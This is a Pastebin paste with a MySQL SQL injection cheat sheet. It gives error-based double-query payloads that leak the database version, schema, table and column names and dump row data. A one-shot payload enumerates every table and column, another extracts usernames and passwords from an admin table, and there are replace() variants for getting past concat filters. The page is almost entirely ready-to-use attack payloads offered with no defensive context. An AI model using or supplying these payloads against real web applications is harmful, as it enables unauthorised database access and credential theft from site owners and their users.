Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Error Base Double query use
- a. The Used Select Statements Have Different Number Of Columns.
- b. Unknown Column 1 or no columns at all (in webpage and page source)
- c. Error #1604
- Show Version
- or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1
- Show Database
- and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- Show tables
- and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- Show columns
- and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTable limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- Dump data from columns
- and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- ----------------------------------------------------
- Error Base
- and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- Error Base Double Query
- Show Version
- and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- Show Database
- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- Show Table from database
- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xDatabase_Name LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- Show Column from table
- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xDatabase_name AND table_name=0xTable_name LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- Dump Data from column
- and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `security`.table_name LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- --------------------------------------------------------
- Dump in one Shot ( Database,Table,Column )
- (select (@x) from (select (@x:=0x00), (select (0) from (information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=/*!50000concat*/(@x,0x3c62723e,table_schema,0x272d2d3e27,table_name,0x272d2d3e27,column_name))))x)
- (select (@) from (select (@:=0x00), (select (@) from tbl_admin_info where (@) in (@:=/*!50000concat*/(@,user_name,0x3a,password))))a)
- ------------------------------------------------------
- if concat block use replace function
- replace(REPLACE(replace(0x5b215d,0x5b,version()),0x21,database()),0x5d,user())
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
